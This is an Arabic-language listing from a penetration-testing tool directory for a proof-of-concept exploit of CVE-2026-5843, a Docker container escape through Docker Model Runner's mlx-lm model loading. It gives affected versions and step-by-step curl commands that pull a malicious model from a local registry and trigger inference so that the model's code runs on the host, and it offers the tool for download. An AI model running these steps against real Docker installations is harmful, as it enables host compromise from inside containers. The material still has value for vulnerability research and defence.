Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-5843 — POC للهروب من حاوية Docker عبر mlx-metal importlib | Kitploit
أدوات/GitHubGitHub/davidrxchester/cve-2026-5843
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالالفريق الأحمرتطوير الحمولاتالهروب من الحاويةأمن الذكاء الاصطناعي
GitHubdavidrxchester/cve-2026-5843

CVE-2026-5843

POC للهروب من حاوية Docker عبر mlx-metal importlib

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-5843 PoC

سجل OCI بسيط يقدم نموذجًا خبيثًا لاستغلال مسار تنفيذ importlib الخاص بـ model_file في mlx-lm. عند تحميل Docker Model Runner للنموذج للاستدلال، يتم تنفيذ model.py على المضيف بصفة المستخدم المسجل دخوله.

يتطلب: Docker Desktop ≤ 4.70.x (Apple Silicon) مع تمكين Model Runner

الاستخدام

root@kitploit:~
# 1. Start the registry on the host
python3 poc_cve_2026_5843.py

# 2. From any container on the Docker network
docker run -it --rm curlimages/curl sh

curl -X POST http://model-runner.docker.internal/api/pull \
  -H 'Content-Type: application/json' \
  -d '{"name":"localhost:5555/evil/model:latest"}'

curl --max-time 120 -X POST http://model-runner.docker.internal/engines/mlx/v1/chat/completions \
  -H 'Content-Type: application/json' \
  -d '{"model":"localhost:5555/evil/model:latest","messages":[{"role":"user","content":"hi"}]}'

تتم كتابة المخرجات إلى ~/Desktop/mlx.txt على المضيف.

الشرح الكامل: https://davidrochester.com/posts/container-escape-via-inference

CVEs ذات الصلة

  • CVE-2026-5817 — vllm-metal trust_remote_code=True، نفس سطح الهجوم، تم إصلاحه في Docker Desktop 4.68.0
تنزيل الأداة